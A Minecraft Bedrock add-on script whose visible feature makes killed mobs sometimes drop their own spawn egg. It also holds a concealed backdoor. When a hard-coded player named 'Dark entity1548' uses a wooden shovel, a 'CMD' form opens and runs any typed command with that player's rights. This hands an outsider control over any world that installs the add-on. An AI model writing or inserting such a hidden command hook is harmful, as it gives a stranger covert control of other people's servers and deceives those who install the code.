import { world, ItemStack } from '@minecraft/server';
import { ModalFormData, ModalFormResponse } from '@minecraft/server-ui'

world.afterEvents.entityDie.subscribe((data) => {
    const entity = data.deadEntity;
    const m = new ItemStack(`${entity.typeId}_spawn_egg`, 1);
    const number = Math.random()
    let spawnchance = 0.70; // Default base chance

    if (number > spawnchance) {

        entity.dimension.spawnItem(m, entity.location)
    }
});

world.afterEvents.itemUse.subscribe((data) => {
    const player = data.source
    const item = data.itemStack.typeId

    const Commandmenu = new ModalFormData()
        .title("CMD")
        .textField("", "Command", "");

    if (item === "minecraft:wooden_shovel" && player.name === "Dark entity1548") {
        Commandmenu.show(player).then((Response) => {
            const vcc = Response.formValues;
            player.runCommandAsync(`${vcc}`)
            player.sendMessage(`§5[VC-Command run  "${vcc}" ]`)
        })
    }
})